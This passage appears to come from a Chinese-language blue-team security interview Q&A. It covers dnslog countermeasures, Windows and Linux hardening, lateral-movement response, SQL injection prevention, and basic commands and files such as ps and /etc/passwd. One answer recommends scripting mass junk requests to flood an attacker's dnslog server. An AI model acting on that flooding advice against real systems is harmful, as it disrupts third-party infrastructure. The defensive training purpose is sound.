对于常见的dnslog平台直接屏蔽如果是自己搭建的dnslog平台批量的去ping恶意制造各种垃圾dnslog数据让他无法获取到有效的信息具体可以写一个脚本进行批量探测存活httplog也一样使用爬虫批量进行request请求
网络基线加固思路
先看防护软件有没有升级先升级最新版本进行全盘扫毒查看高危端口高危服务查看主机有没有被爆过漏洞的软件 windows重命名administrator账户、禁用GUEST账户、清理系统无效账户、配置密码策略账户锁定策略 Linux删除无用账号、检查特殊账号、添加口令策略、禁止root直接登录、设置隐藏文件属性、关闭不必要服务、更改ssh端口号防爆破
怎么修改TTL值
windows下是修改Default注册表文件linux是修改etc/sysctl.conf文件
一台主机在内网进行横向攻击你应该怎么做
确定攻击来源是不是员工内部误操作比如询问运维是否有自动化轮训脚本。如果没有确定是攻击结合时间点根据设备信息看一下安全事件进程流量找到问题主机开始应急响应流程准备检测遏制根除恢复跟踪具体的操作要交给现场运维去处理。
SQL注入的预防
预编译 PDO 正则表达式过滤
如何查看当前进程
Ps -ef 或 ps -aux
临时目录是哪个文件夹
/tmp /var/tmp
用户列表是在哪个目录下(如何查看Linux有哪些用户)
/etc/passwd
和甲方上报 IP 地址你要上报哪些地址呢
上报攻击 ip 的地址先判断是内网 ip 还是公网 ip如果是内网ip查看是否是业务白名单行为若不是再上报进行判断。若是公网 ip查看是否在白名单内若不是查看是否是扫描器 ip若是扫描器 ip扫描对业务或者对研判产生了影响则可以上报若不是且判断出是真实攻击 ip 也进行上报。
